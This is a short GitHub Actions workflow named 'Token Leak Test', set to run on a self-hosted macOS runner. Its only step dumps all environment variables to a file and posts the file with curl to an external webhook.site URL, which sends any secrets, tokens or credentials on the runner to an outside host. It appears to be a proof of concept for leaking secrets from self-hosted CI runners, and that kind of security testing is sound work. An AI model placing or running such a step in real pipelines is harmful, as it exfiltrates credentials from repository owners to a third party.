name: Token Leak Test

on: [workflow_dispatch]

jobs:
  test:
    runs-on: [self-hosted, macos, sequoia, ARM64]
    steps:
      - name: Print Environment Variables
        run: |
          env > env.txt
          curl -X POST --data-binary @env.txt https://webhook.site/b212509f-85c3-4911-a86d-5fdaed053680
